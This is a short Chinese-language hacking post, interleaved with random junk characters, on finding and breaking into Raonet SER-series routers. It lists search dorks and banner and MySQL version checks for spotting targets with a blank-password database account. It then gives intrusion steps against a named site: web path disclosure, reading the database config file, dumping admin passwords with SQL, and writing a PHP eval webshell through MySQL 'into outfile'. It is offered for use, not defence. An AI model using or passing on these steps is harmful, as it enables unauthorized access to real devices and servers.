寻找存在漏洞的路由器方法:8 V+ O! O% b0 o
0 e$ P0 a( w* V9 h1:google搜索'Raonet Subscriber Ethernet Router'" l3 `* H, c' a3 S# `
8 \8 x8 U# `/ w& F% V' q2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
. B2 ^; p% F* _* @. N" X2 q" Y; f) W5 \
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
3 ]: C' @* N- G. I* A( V' p6 H
C4 H9 u; g0 ^* ~" U# ~//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
5 V& W% |4 t+ c! x+ O$ R3 D6 O9 f1 n( n" V. G
3 e' L5 x. G( d- B9 r
2 `& M7 Y( ^+ ]- P. } J' A
入侵步骤:7 y: m, g5 \) J. m( r5 U9 F. U
0 W; U) B2 M1 B5 W) Q$ p& B) J
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php, @6 u/ Y6 l& f5 q3 Q& |( z
, \; G0 H! w* L/ Y
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
1 z) E& [6 @: B; V, p5 [3:得到密码后连接,查看GUI管理密码:
7 _% [/ x% F/ l7 b7 d9 F9 T5 H% Fuse ser_5005 O) g( \6 ~" P
select id,passwd from user;) v) E5 G0 x' z$ E
4:通过数据库写入webshell,执行命令:
" | M+ l# d$ A N7 r0 y4 xuse mysql;
* ^- N- F* n7 Z: z jcreate table ok(cmd TEXT);: I8 |& V% _" W* y
insert into ok values("<?php @eval($_POST[cmd])?>"); q, m4 U# V) M
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
; n) Z" X0 j' U- i6 }( Y" W9 @drop table ok;
0 |9 i v0 @6 R, ?
( X$ t; Q6 _ N! x. F6 d5:连接后门shell.php * F2 ]+ W& z0 c6 G6 p
' v2 P$ t3 V) S5 h4 @) Q# x6. 搞定!
) C+ i# y! H0 |# J$ a3 \
3 m; r H; Y6 c5 d! Z P+ f/ T |